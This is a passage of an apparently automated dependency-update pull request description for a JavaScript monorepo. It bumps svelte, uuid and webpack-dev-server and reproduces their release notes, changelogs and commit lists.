npm_and_yarn group with 1 update in the /plugins/training-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/uploader-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/view-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/workbench-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /pods/front directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/core directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/front directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/tool directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/ai-bot/pod-ai-bot directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/github/github-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /services/gmail/pod-gmail directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/love directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/telegram/pod-telegram directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /templates/package directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /templates/ui directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in utils.js\u0026quot; (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18\"\u003e#18\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.10/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e 